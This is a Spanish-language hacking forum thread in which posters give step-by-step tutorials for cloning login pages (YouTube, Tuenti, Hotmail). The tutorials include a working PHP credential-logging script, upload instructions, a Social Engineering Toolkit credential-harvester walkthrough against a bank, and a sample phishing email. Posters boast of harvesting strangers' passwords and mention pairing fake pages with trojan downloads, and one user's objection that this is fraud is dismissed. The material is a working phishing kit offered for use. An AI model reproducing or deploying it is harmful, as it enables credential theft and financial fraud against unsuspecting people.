asi lo hice yo
el que quiera uno que se lo haga este es por connor asi que me ahorro trabajar

Para empezar, tendremos que entrar en [Enlace externo eliminado para invitados]
Imagen

Nos registramos y entramos aqui:
Imagen

Rellenamos los campos que os señalo aqui:
Imagen

En le siguiente paso poneis la URL:
Imagen

En mi caso pongo esta para el Tutorial:
Imagen

Bale ahora esperamos 15 minutos y refrescamos:
Imagen

En caso de que no espereis los 15 minutos (mas o menos), la pagina seguira en revision de un administrador para activarla, etc. y es saldra algo como esto:
Imagen

Vale, volvemos a la url de antes y clickamos aqui:
Imagen

Ahora cogemos del apartado de FTP los datos de abajo:
Imagen


Ahora descargamos Filezilla Client:
Tras instalarlo, lo ejecutamos:
Imagen

Ahora cogemos estos datos:
Imagen

Y los insertamos tal que aqui:
Imagen

Tras conectarnos apareceran estos apartados:
Imagen

Entramos a "www":
Imagen

Arrastramos los archivos que se descompriman del .rar que os pongo mas abajo con el link:
Imagen


Sucedera esto:
Imagen

Y si visitamos la pagina (En mi caso [Enlace externo eliminado para invitados] ), se cargará el index.php o index.html que hemos metido mediante Filezilla:
Imagen

Ahora pongo un ejemplo de Login:
Imagen

Me redirecciona a la web oficial:
Imagen

Código: Seleccionar todo

Ahora 2 metodos para recoger los datos de una victima:

Metodo 1

Accedemos directamente a esta URL:
DireccionDeNuestraPaginaFalsa.com.nu/log.txt :
Imagen

Código: Seleccionar todo

Metodo 2

Desde filezilla hacemos boton derecho aqui:
Imagen

Y click aqui para que se nos abra en un block de notas:
Imagen

Hasta aqui el tutorial :)
[Enlace externo eliminado para invitados]
preparar una Web para phishing desde 0

Para comenzar debeis buscar la pagina a falsificar. En mi caso utilizaré YouTube.

Este metodo no creo que sirva en todas las paginas pero en las ultimas 3 que he probado (ademas de ser una tecnica sencilla), sirve como todas las demas.

Comenzare entrando a YouTube.com:
Imagen

Entramos a la pagina de login:
Imagen

Damos boton derecho y le damos a Ver codigo fuente de pagina:
Imagen

Y aqui tendremos su codigo fuente. Lo seleccionamos todo y le damos a copiar:
Imagen

Imagen

Abrimos un editor de texto y lo pegamos:
Imagen

Ahora buscamos este apartado:
Imagen

El apartado comienza por <form id=... En algunas paginas os saldran los apartados mas marcados. como HEADER, BODY, etc. y asi se hace mas facil buscar el apartado, pero en este caso, con darle a Ctrl + B lo buscamos y punto:
Imagen

Lo sustituimos por:
<form action="index_carg.php" method="post"><table>
Lo que manda el codigo es:
Cuando esta Form tenga que hacer su acción, que ponga en funcionamiento el archivo index_carg.php (que unas fotos mas adelante vereis su estructura).

Lo sustituimos:
Imagen

Abrimos nuevo editor de texto e introducmos esto:

Código: Seleccionar todo

[color=#FF0000]<?php
$login=$_POST["AQUI VA EL NOMBRE DEL APARTADO DEL USUARIO QUE SE VE EN EL INDEX.PHP"]; 
$pass=$_POST["AQUI VA EL NOMBRE DEL APARTADO DE LA CONTRASEÑA QUE SE VE EN EL INDEX.PHP"];
$guardar=fopen("admin.txt",a);
fwrite($guardar,"
Usuario:".$login."
Contraseña:".$pass);
fclose($guardar);
echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=AQUI VA LA URL A LA QUE S VA A REDIRECCIONAR NUESTRA WEB FALSA'>";
?>[/color]
Aqui se ve el ejemplo:
Imagen

Ahora abrimos de nuevo el index.php y buscamos debajo de donde hemos puesto <form action="index_carg.php" method="post"><table> algun apartado relacionado con Username, User, Usuario, Email, etc. Debemos coger la palabra que va despues de "id=":
Imagen

Ahora hacemos el mismo paso con el de la Contraseña, Password, Password, Pass, etc. En este caso es asi:
Imagen

Ahora guardamos el archivo index_carg.php. ¿Y porque este nombre? Por que antes en <form action="index_carg.php" method="post"><table> lo hemos llamado asi.
Imagen

Una vez guardado hacemos esto:
Imagen

Para terminar lo arrastramos a un navegador y vemos el resultado.
Imagen

Si probais de esta forma a iniciar sesion, por mucho que le deis, no hara nada, ya que los .php necesitan estar online para trabajar. Por lo tanto, si pones un usuario y una contraseña sin habelo subido a un serviro, en el archivo admin.txt de tu escritorio no se guardara nada.

Espero haberos sido de gran ayuda y una ultiam cosita:

Si haceis el SCAM o pagina falsa como ahora de una web, y al probarlo, veis que alguna imagen está rota, os recomiendo que entreis en la pagina oficial, que busqueis como se llama esa imagen mediante Inspeccionar elemento o Ver codigo fuente de pagina, y buscarla en internet. Seguro que en mucas paginas podreis descargar la foto. Luego la subis a un servidor como ImagesHack, copiais el link, y en nuestro SCAM o .php falo, cambiais la direccion de esa pagina, por la URL que os da ImagesHack de la imagen. Asi solucionariamos el problema de las imagenes rotas.
te respondo al porque de no se ven las ñ ni las tildes es por la copia del codigo directamente se genera una pagina de estilo ala que tenia la web, lo ideal ami parecer es programarla de 0 o guardarla entera , esta muy bien el manual , pero hay q decir que no siempre funcionan así por ejemplo Hotmail utiliza un metodo mas seguro redirecionando los labels de el login a un servidor distinto de este modo cuando copiamos el código nos aparecen 4 labels o dos duplicadas, luego cuando tenga tiempo explico como solventar este tipo de problemas ;)
cuando te loqueas la pagina te manda ala dirección de hotmail buena ...pero claro ya caíste en la mala antes y no se coscan
la que pusiste tu esta no te manda después de loquearte a la ¡¡autentica¡¡ de tuenti fíjate en la que puse yo al principio
en la tuya se cosca el usuario del tiron d_pit_88 no entiendo el porque no te redimenciona la tuya

asi el usuario cuando se loquee por segunda vez ya entra en tuenti ....no se explica que paso por mucho que mire la paguina ya esta en la autentica nose si me esplico d_pit_88

mira esta [Enlace externo eliminado para invitados] cuando metes el pass te manda a la buena como si ubieras fallado y ya puede entrar en la buena

creo que hice una feisbook pero andara por alli no la mire siquiera aver si esta y la pongo vale
mira este [Enlace externo eliminado para invitados] me equiboque con el nombre es tuenti

bueno es igual pero mas o menos es asi almenos nose hacerlo de otra manera salu2
dvdr escribió:cuando te loqueas la pagina te manda ala dirección de hotmail buena ...pero claro ya caíste en la mala antes y no se coscan
la que pusiste tu esta no te manda después de loquearte a la ¡¡autentica¡¡ de tuenti fíjate en la que puse yo al principio
en la tuya se cosca el usuario del tiron d_pit_88 no entiendo el porque no te redimenciona la tuya

asi el usuario cuando se loquee por segunda vez ya entra en tuenti ....no se explica que paso por mucho que mire la paguina ya esta en la autentica nose si me esplico d_pit_88

mira esta [Enlace externo eliminado para invitados] cuando metes el pass te manda a la buena como si ubieras fallado y ya puede entrar en la buena

creo que hice una feisbook pero andara por alli no la mire siquiera aver si esta y la pongo vale
me haces ver que ni te descargaste el codigo para mirar el fake XD si te manda ala pagina original si no que ademas de manda ala original /login_error con lo q le aparecerá que a puesto mal la contraseña, tienes q informarte un poco mas antes de hablar amigo ...
bueno el link del fake de tuenti que dejaste no redimencionaba ¡¡por eso ni me moleste en descargarlo .....pero ya lo ago aver


se cayeron los link
dvdr escribió:bueno el link del fake de tuenti que dejaste no redimencionaba ¡¡por eso ni me moleste en descargarlo .....pero ya lo ago aver


se cayeron los link
si lo quieres te lo paso por privado mejor , por que no quiero que la gente lamme lo deje 2 dias online y ya tenia contraseñas de gente q no conocia XD
zekor escribió:Estas cosas no estan prohibidas?¿ que yo sepa esto es phishing vamos estafa,entonces se pueden postear fake de bancos y de paginas o hacer una seccion de ello?¿ etc...las normas no hay quien las entienda
tu le llamas estafa yo le yamo informacion para el usuario
lo que se hace en wireless...tambien lo yamas estafa
y el zona hanking tambien lo yamas estafa
apreden informar y compartir conocimiento crear y mejorar eso hago

¡¡tu estas hablando de bancos ¡¡

aqui te quedas con tu comentario campeon
zekor escribió:Estas cosas no estan prohibidas?¿ que yo sepa esto es phishing vamos estafa,entonces se pueden postear fake de bancos y de paginas o hacer una seccion de ello?¿ etc...las normas no hay quien las entienda

Procedimiento para expedir un correo de phishing: te refieres a esto

Paso 1
Iniciamos sesión en nuestro Sistema Backtrack 5 nos dirigimos a la barra de tareas ubicada en la parte superior y damos click en Applications > BackTrack > Social Engineering Toolkit > set.
Imagen
Social Engineering Toolkit: Se trata de los vectores de ataque mejor elaborados, robustos y con mayores probabilidades de éxito que se han desarrollado en SET debido a que son específicamente diseñados para construir sitios web “ficticios” que son incitantes y creíbles para el objetivo, además cuentan con técnicas bastante elaboradas que permiten que un objetivo sea víctima sin enterarse tan siquiera que ha sido engañado.

En SET las opciones correspondientes a este tipo de ataque son:

Java Applet Attack Method
Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web Jacking Attack Method
Multi-Attack Web Method
Create or import a CodeSigning Certificate
Paso 2

Del menú de opciones seleccionamos la opción 2. Website Attack Vectors.

Imagen

Paso 3

Seleccionamos la opción 3. Credential Harvester Attack Method

Imagen
Credential Harvester Attack Method: Este tipo de ataque permite a un atacante clonar un sitio que tenga algún tipo de formulario de autenticación (formularios donde se solicita usuario y clave, como por ejemplo gmail) posteriormente cuando una víctima ingresa en dicho sitio e ingresa sus credenciales de acceso, SET recolecta toda esta información y posteriormente envía al usuario al sitio original, finalmente cuando el atacante desea finalizar la ejecución del ataque, obtiene un informe con la información recolectada.
Paso 4

Seleccionamos la opción 2. Site Cloner

Imagen

Paso 5

Procedemos a ingresar la url del sitio a clonar.

En nuestro ejemplo usamos:

[Enlace externo eliminado para invitados]

Imagen

Paso 6

Se remite el link al correo con la url de la página falsa y se espera a que realice clic a nuestro link que lo llevara a nuestro sitio falso para que proporcione su credencial de acceso.

En nuestro ejercicio se tomo como modelo el sitio del Banco de Pichincha.

Imagen

Paso 7

Nuestra victima visualiza el correo de phishing y realiza un clic a la url.

Imagen

Imagen
CONTENIDO DEL CORREO
Estimado Cliente del Banco del Pichicha
el motivo del presente es para comunicarle
la actualización de datos en nuestras cuentas
de usuario por favor ingrese a el siguiente link
[Enlace externo eliminado para invitados] para la actualización
de sus datos en su cuenta biométrica muchas
gracias.

Att. Adminitrador de Base de Datos Banco del Pichincha
Paso 8

Nuestra victima visualiza el sitio falso (clonado) procede a proporcionar credencial de acceso.

Datos ingresados en el ejercicio:

Usuario Biométrico: Phishing
Clave Biométrico: Seguridad

Imagen

Paso 9

Nuestro ataque surte efecto gracias a la herramienta SET que recolecto los datos relacionados a la credencial de acceso de nuestra victima.

Imagen


[Enlace externo eliminado para invitados]
jajajaj COMO TE LO CURRAS dvdr , Que grande eres ¡¡¡ ya lo sabia pero me sorprende lo q te molestas en poner tus imagenes y tus explicaciones muy buenas sin duda , solo puedo aplaudir
d_pit_88 y encima se quejan por hay arriba un
un salu2 d_pit_88

se me pone la cpu por las nubes en el foro este ....y se me apaga el pc con linux seran los scritp del foro nose
dvdr escribió:d_pit_88 y encima se quejan por hay arriba un
un salu2 d_pit_88

se me pone la cpu por las nubes en el foro este ....y se me apaga el pc con linux seran los scritp del foro nose
Imposible, los scripts se ejecutan en el servidor xD. debe ser otro motivo que solo te pasa a ti, yo tengo la cpu ahora mismo al 4%
Soy un camaleón, en tu cama, leona ♪
$DoC perdón es cuando respondo en el foro
si responde a este mensaje dejalo 1minuto antes de darle enviar aver si te sube
es por curiosidad
Lo de las "ñ" y acentos me pasa solo cuando abro el archivo con el código fuente desde mi PC, pero si subo la página a un servidor FTP no tengo problemas en eso y me la muestra bien.

Hace como un mes, antes de que apareciera este post yo también hice un tutorial, un videotutorial en realidad.
Se puede ver todo mas gráficamente así es que para quienes quieran aprender pueden ver también el mio.
http://www.indetectables.net/foro/viewt ... =8&t=36252

También, hace muuucho tiempo vi un tutorial de Ozzteel y mezclaba dos estrategias; el phishing y el troyanismo (de no ser así el nombre correcto, corrijanme). Y en él se enseñaba una forma en que a través de un scam de YouTube que "no permitía ver el video" por falta del flash media player y como solución ofrecía descargarselo, pero por su puesto se descargaría nuestro server.
Pueden verlo aquí: http://www.indetectables.net/foro/viewt ... =8&t=28338
Yo lo hice y me funcionó, es muy buena la técnica, y como me intereso mucho me puse a editar la página fake de Ozzteel que tenía unos cuantos fallos y así le dí un toque más creíble. Si él me lo permite, quizá haga un videotutorial parecido al suyo con una explicación más facil y con el fake más verdadero.

@dvdr:
Me gustan tus aportes, pero tengo unas criticas.
voy a arreglar este que esta anticuado ya [Enlace externo eliminado para invitados] y verlo [Enlace externo eliminado para invitados]
todos lo que entran en mi blog se loquean hay y mira que pongo phishing de hotmail
Eso no esta bien como dijo $DoC, pues no estas enseñando nada sino que le das una forma rápida a la gente de robar. Sin embargo te diste cuenta e hiciste tus tutoriales pero creo que deberias publicarlo en Manuales y Tutoriales como un tema nuevo, no aquí, en Nuestros Programas ni en un tema ya creado. Aparte de moverlos también deberías dejar de usar la palabra robo, estafa, etc. ya que suponese indetectables es un foro educativo
Segundo, estan buenos tus tutoriales pero creo yo que sería más facil para tí y para el resto de la gente hacer video tutoriales, así no usas tanto espacio ni te empeñas tanto en subir las imagenes y demás.
Tercero pareciera como si enviaras respuestas demás por alguuun motivo . Si quieres hablar con d_pit_88 aganlo por MSN o por mensajes privados y no agan del tema un chat, por ende este punto también va para él. No es que sea moderador ni nada pero desde mi punto parecía como SPAM.
Y te reitero el segundo punto, de verdad deberías subir tus tutoriales a la zona que te digo, serían buen aporte para el resto, solo agrégales un poco de formalidad y quita esas palabras maliciosas y listo!
Hack 'em all
Skype: szudisch
(C) Szudisch 2013
Responder

Volver a “Nuestros Programas”